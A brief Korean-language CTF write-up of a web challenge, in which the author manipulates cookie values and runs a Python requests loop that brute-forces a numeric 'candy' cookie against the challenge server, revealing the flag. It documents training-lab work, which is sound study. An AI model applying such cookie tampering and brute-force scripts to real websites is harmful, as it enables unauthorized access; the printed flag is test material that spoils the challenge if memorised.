문제 화면이다. 디저트를 제출해라. 딱 봐도 쿠키관련 문제인것 같다.
초콜릿이 더 좋다고 하니 쿠키값을 초콜릿으로 바꾸었다.
이번엔 캔디가 더 좋단다. candy를 제출값으로, 쿠키값을 chocolate으로 보내보니
브루트포스라는 주석이 추가되고 candy 쿠키값이 추가되었다. 딱 봐도 candy값을 브루트포스 하라는것 같아서 페이로드를 작성해서 돌려보았다.
import requests
test=1
for i in range (1000):
url = 'http://ctf-hackingcamp.com:3000/'
data ={}
cookies = {}
data['flag']='candy'
cookies['dessert']='chocolate'
cookies['candy']=str(i)
res = requests.post(url=url, data=data, cookies=cookies)
if test == 1:
test = res.text
elif test != res.text:
print(res.text)<p>I need more...</p><!-- brute force attack --><p>Flag : HCAMP{F1a9_i$_Sw33t}</p> </div>
solved! 쉬운문제였다.
Inha University / CTF Web Player / Team Riot of Noob